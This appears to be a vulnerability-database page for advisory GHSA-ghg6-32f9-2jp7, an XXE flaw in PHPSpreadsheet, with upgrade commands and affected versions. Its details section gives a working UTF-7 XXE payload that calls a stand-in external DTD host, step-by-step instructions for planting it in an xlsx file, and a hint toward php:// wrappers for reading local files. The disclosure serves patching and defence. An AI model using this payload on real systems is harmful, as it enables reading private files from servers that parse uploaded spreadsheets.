VDB
Sign up
HIGH8.8

GHSA-ghg6-32f9-2jp7

XXE in PHPSpreadsheet encoding is returned

Quick fix

GHSA-ghg6-32f9-2jp7 — phpoffice/phpspreadsheet: upgrade to the fixed version with the command below.

composer require phpoffice/phpspreadsheet:^1.29.1

Details

### Summary Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack)

### Details Check ` $pattern = '/encoding="(.*?)"/';` easy to bypass. Just use a single quote symbol `'`. So payload looks like this: ``` <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]> ``` If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute.

### PoC 1) Create simple xlsx file 2) Rename xlsx to zip 3) Go to the zip and open the `xl/sharedStrings.xml` file in edit mode. 4) Replace `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>` to ``` <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]> ``` 5) Save `sharedStrings.xml` file and rename zip back to xlsx. 6) Use minimal php code that simply opens this xlsx file: ``` use PhpOffice\PhpSpreadsheet\IOFactory; require __DIR__ . '/vendor/autoload.php'; $spreadsheet = IOFactory::load("file.xlsx"); ``` 7) You will receive the request to your `http://%webhook%/file.dtd` 8) Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.

### Impact Read local files ![lfi](https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931)

Are you affected?

Enter the version of the package you're using.

Affected packages

Packagist/phpoffice/phpspreadsheet
Introduced in: 0Fixed in: 1.29.1
Fixcomposer require phpoffice/phpspreadsheet:^1.29.1
Packagist/phpoffice/phpspreadsheet
Introduced in: 2.2.0Fixed in: 2.2.1
Fixcomposer require phpoffice/phpspreadsheet:^2.2.1
Packagist/phpoffice/phpspreadsheet
Introduced in: 2.0.0Fixed in: 2.1.1
Fixcomposer require phpoffice/phpspreadsheet:^2.1.1
Packagist/phpoffice/phpexcel
Introduced in: 0

No fixed version published yet for phpoffice/phpexcel (composer). Pin to a known-safe version or switch to an alternative.

References